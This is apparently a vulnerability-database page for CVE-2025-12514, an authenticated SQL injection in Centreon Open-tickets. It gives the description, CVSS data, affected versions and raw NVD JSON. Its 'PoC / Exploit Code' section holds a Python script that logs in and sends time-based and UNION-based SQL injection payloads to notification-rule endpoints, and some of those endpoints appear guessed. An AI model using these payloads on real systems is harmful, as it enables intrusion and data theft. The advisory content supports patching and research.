Security Vulnerability Report
中文
CVE-2025-12514 CVSS 7.2 HIGH

CVE-2025-12514

Published: 2025-12-22 11:15:57
Last Modified: 2026-01-26 15:52:39
Source: bd4443e6-1eef-43f3-9886-25fc9ceeaae7

Description

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Centreon Infra Monitoring - Open-tickets (Notification rules configuration parameters, Open tickets modules) allows SQL Injection to user with elevated privileges.This issue affects Infra Monitoring - Open-tickets: from 24.10.0 before 24.10.5, from 24.04.0 before 24.04.5, from 23.10.0 before 23.10.4.

CVSS Details

CVSS Score
7.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:centreon:open_tickets:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:centreon:open_tickets:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:centreon:open_tickets:*:*:*:*:*:*:*:* - VULNERABLE
Centreon Open-tickets 24.10.0 - 24.10.4
Centreon Open-tickets 24.04.0 - 24.04.4
Centreon Open-tickets 23.10.0 - 23.10.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-12514 Centreon Open-tickets SQL Injection PoC # Target: Centreon Infra Monitoring <= 24.10.4, <= 24.04.4, <= 23.10.3 # Author: Security Researcher # Note: This PoC is for educational and authorized testing purposes only import requests import sys from urllib.parse import quote def test_sql_injection(target_url, username, password): """Test for SQL injection in Centreon Open-tickets notification rules""" # Login to Centreon session = requests.Session() login_url = f"{target_url}/centreon/index.php" login_data = { "username": username, "password": password } print(f"[*] Attempting to login to {target_url}") response = session.post(login_url, data=login_data) if "loginFailed" in response.text or response.status_code != 200: print("[-] Login failed - check credentials") return False print("[+] Login successful") # SQL Injection payload for time-based blind injection # Target: Notification rules configuration parameters sql_payload = "' OR SLEEP(5)---" # Target endpoint for Open-tickets notification rules vuln_endpoint = f"{target_url}/centreon/main.php?p=60907&o=c&notification_rule_id=1" # Alternative endpoint for open tickets module alt_endpoint = f"{target_url}/centreon/api/index.php?action=openTicket&param={quote(sql_payload)}" print(f"[*] Testing SQL injection at: {vuln_endpoint}") # Time-based blind injection test import time start_time = time.time() test_data = { "notification_rule_name": sql_payload, "notification_rule_alias": "test_rule", "notification_rule_activate": "1" } response = session.post(vuln_endpoint, data=test_data, timeout=30) elapsed_time = time.time() - start_time if elapsed_time >= 4: print(f"[+] SQL Injection confirmed! Response time: {elapsed_time:.2f}s") print(f"[+] Payload executed: {sql_payload}") return True # UNION-based injection for data extraction union_payload = "' UNION SELECT NULL,NULL,version(),user(),database()---" test_data["notification_rule_name"] = union_payload response = session.post(vuln_endpoint, data=test_data) if "database()" in response.text or "information_schema" in response.text.lower(): print("[+] UNION-based SQL injection confirmed") return True print("[-] SQL injection test completed - review results manually") return False if __name__ == "__main__": if len(sys.argv) < 4: print(f"Usage: python {sys.argv[0]} <target_url> <username> <password>") print(f"Example: python {sys.argv[0]} http://localhost/centreon admin password") sys.exit(1) target = sys.argv[1].rstrip('/') user = sys.argv[2] pwd = sys.argv[3] test_sql_injection(target, user, pwd)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-12514", "sourceIdentifier": "bd4443e6-1eef-43f3-9886-25fc9ceeaae7", "published": "2025-12-22T11:15:56.990", "lastModified": "2026-01-26T15:52:38.793", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Centreon Infra Monitoring - Open-tickets (Notification rules configuration parameters, Open tickets modules) allows \n\nSQL Injection to user with elevated privileges.This issue affects Infra Monitoring - Open-tickets: from 24.10.0 before 24.10.5, from 24.04.0 before 24.04.5, from 23.10.0 before 23.10.4."}], "metrics": {"cvssMetricV31": [{"source": "bd4443e6-1eef-43f3-9886-25fc9ceeaae7", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "bd4443e6-1eef-43f3-9886-25fc9ceeaae7", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:centreon:open_tickets:*:*:*:*:*:*:*:*", "versionStartIncluding": "23.10.0", "versionEndExcluding": "23.10.4", "matchCriteriaId": "690236FE-B2D6-4CD9-A238-8AAAFA806345"}, {"vulnerable": true, "criteria": "cpe:2.3:a:centreon:open_tickets:*:*:*:*:*:*:*:*", "versionStartIncluding": "24.04.0", "versionEndExcluding": "24.04.5", "matchCriteriaId": "7DE49827-44BF-4560-99B1-0642ED561161"}, {"vulnerable": true, "criteria": "cpe:2.3:a:centreon:open_tickets:*:*:*:*:*:*:*:*", "versionStartIncluding": "24.10.0", "versionEndExcluding": "24.10.5", "matchCriteriaId": "F0BF65DE-555C-4CE0-A807-77F3F6310BDD"}]}]}], "references": [{"url": "https://github.com/centreon/centreon/releases", "source": "bd4443e6-1eef-43f3-9886-25fc9ceeaae7", "tags": ["Release Notes"]}, {"url": "https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-12514-centreon-open-tickets-high-severity-5343", "source": "bd4443e6-1eef-43f3-9886-25fc9ceeaae7", "tags": ["Patch", "Vendor Advisory"]}]}}